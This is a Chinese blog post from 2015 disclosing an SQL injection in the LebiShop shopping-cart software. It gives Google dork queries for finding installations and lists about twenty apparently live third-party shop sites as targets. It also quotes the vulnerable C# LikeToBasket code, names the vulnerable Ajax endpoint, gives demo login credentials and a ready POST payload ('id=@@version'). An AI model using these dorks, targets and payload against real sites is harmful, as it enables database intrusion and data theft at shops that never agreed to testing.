LebiShop系统sql注入

时间：2015-2-8 作者：admin 分类： 技术交流

用google搜索关键词 intext:Powered by LebiShop

或者google搜索关键词

Powered by LebiShop inurl:Category.aspx

部分案例

code 区域

http://168dev.com/lebishop/Category.aspx

http://oa.psy123.com.cn/AllCategories.aspx

http://www.huacaiye.com/Category.aspx?tid=1

http://daiba.com.cn/Category.aspx?id=9

http://hkapp.cn/EN/Category.aspx?id=10

http://54mbb.com/EN/NewsDetails.aspx?id=5

http://shop.lutoog.com/Brand.aspx?id=189

http://queengift.net/EN/Brand.aspx?id=190

http://www.snsrn.com/en/

http://www.skycastle100.com/Search.aspx?keyword=lianyiquan

http://71pg.com/Category.aspx?tid=35

http://www.rft.net.cn/Search.aspx?keyword=[key]&sort=1&page=2

http://lovedou.com/en/

http://www.woofoo51.com/EN/Category.aspx?id=111&pid=0&sort=1&tid=0&page=1

http://newautoch.com/NewsDetails.aspx?id=5

http://memy.cc/

http://www.thanks789.com/Brand.aspx?id=191

http://m.gzyytz.cn/

http://www.thanks789.com/Brand.aspx?id=191

漏洞地址

code 区域

http://demo.lebi.cn/ajax/Ajax_userin.aspx

code 区域

public void LikeToBasket()

{

    string str = RequestTool.RequestString("id"); //只对单引号进行处理

    string str2 = "";

    if (str != "")

    {

        foreach (Lebi_User_Product product in B_Lebi_User_Product.GetList(string.Concat(new object[] { "(Type_id_UserProductType=141 or Type_id_UserProductType=144) and User_id=", base.CurrentUser.id, " and id in (", str, ")" }), "")) //存在注入

        {

            Lebi_User_Product model = B_Lebi_User_Product.GetModel(string.Concat(new object[] { "User_id=", base.CurrentUser.id, " and product_id=", product.Product_id, " and type_id_UserProductType=142" }));

            if (model != null)

            {

                model.count = product.count;

                B_Lebi_User_Product.Update(model);

            }

            else

            {

                product.Type_id_UserProductType = 0x8e;

                product.count = product.count;

                B_Lebi_User_Product.Add(product);

            }

        }

        str2 = string.Concat(new object[] { base.Tag("商品已加入购物车"), "<div>", base.Tag("数量"), " <span>", base.Basket_Product_Count(), "</span> ", base.Tag("件"), " <span>", base.FormatMoney(base.Basket_Product_Price()), "</span></div><div><a href='", base.URL("P_Basket", ""), "' class='btn btn-7'><s></s>", base.Tag("查看购物车"), "</a>  <a href='javascript:void(0)' onclick='cloesedialog();' class='btn btn-11'><s></s>", base.Tag("关闭"), "</a></div>" });

    }

    base.Response.Write(string.Concat(new object[] { "{\"msg\":\"OK\",\"count\":\"", base.Basket_Product_Count(), "\",\"amount\":\"", base.FormatMoney(base.Basket_Product_Price()), "\",\"mes\":\"", str2, "\",\"url\":\"", base.URL("P_AddToBasket", ""), "\"}" }));

}

先注册账号登陆 http://demo.lebi.cn/Register.aspx

test333 密码111111

注册登陆后访问

code 区域

http://demo.lebi.cn/ajax/Ajax_userin.aspx

post提交

code 区域

__Action=LikeToBasket&id=@@version

标签: sql注入 LebiShop

感谢9年的陪伴，江湖再见！！！

标签

热门文章

链接